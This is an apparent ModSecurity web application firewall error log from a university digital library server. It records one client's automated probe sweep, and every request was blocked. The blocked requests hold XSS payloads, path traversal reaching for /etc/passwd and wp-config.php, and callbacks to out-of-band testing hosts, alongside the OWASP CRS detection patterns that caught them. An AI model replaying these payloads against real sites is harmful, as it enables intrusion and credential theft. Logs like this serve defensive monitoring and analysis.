[Tue Aug 29 11:51:30.709533 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAjdQVcAAAAZ"]
[Tue Aug 29 11:51:31.555448 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAmIbQ0AAAAo"]
[Tue Aug 29 11:51:31.577037 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15U8Co-f0AAAm7m-wAAAAE"]
[Tue Aug 29 11:51:34.686794 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VsCo-f0AAAmQ-zgAAAAb"]
[Tue Aug 29 11:51:34.803561 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnf3kEAAAAM"]
[Tue Aug 29 11:51:34.908347 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15VsCo-f0AAAnd290AAAAI"]
[Tue Aug 29 11:51:34.992999 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15VsCo-f0AAAnepMMAAAAK"]
[Tue Aug 29 11:51:35.012448 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnepMQAAAAK"]
[Tue Aug 29 11:51:35.555279 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnB5XkAAAAJ"]
[Tue Aug 29 11:51:39.533613 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAkyyGkAAAAW"]
[Tue Aug 29 11:51:40.861444 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAnqj6sAAAAC"]
[Tue Aug 29 11:51:42.535410 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAjdQW4AAAAZ"]
[Tue Aug 29 11:51:44.574817 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAnn19wAAAAe"]
[Tue Aug 29 11:51:45.544123 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAm7nCwAAAAE"]
[Tue Aug 29 11:51:47.572390 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAni@7UAAAAU"]
[Tue Aug 29 11:51:48.683681 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAmQ-1UAAAAb"]
[Tue Aug 29 11:51:48.731233 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnkwcIAAAAY"]
[Tue Aug 29 11:51:50.731972 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAnqj8UAAAAC"]
[Tue Aug 29 11:51:51.539556 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAnmT38AAAAd"]
[Tue Aug 29 11:51:51.659280 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAnepQEAAAAK"]
[Tue Aug 29 11:51:53.889399 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAnqj9QAAAAC"]
[Tue Aug 29 11:51:53.920168 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAnmT4cAAAAd"]
[Tue Aug 29 11:51:54.597415 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15asCo-f0AAAfWOJYAAAAL"]
[Tue Aug 29 11:51:55.827191 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAngCWgAAAAP"]
[Tue Aug 29 11:51:56.589010 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAnGkMYAAAAR"]
[Tue Aug 29 11:51:57.567896 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAnn1-EAAAAe"]
[Tue Aug 29 11:51:58.649199 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAnd3CsAAAAI"]
[Tue Aug 29 11:51:59.548678 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAlUln4AAAA0"]
[Tue Aug 29 11:51:59.591242 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAn40x4AAAAW"]
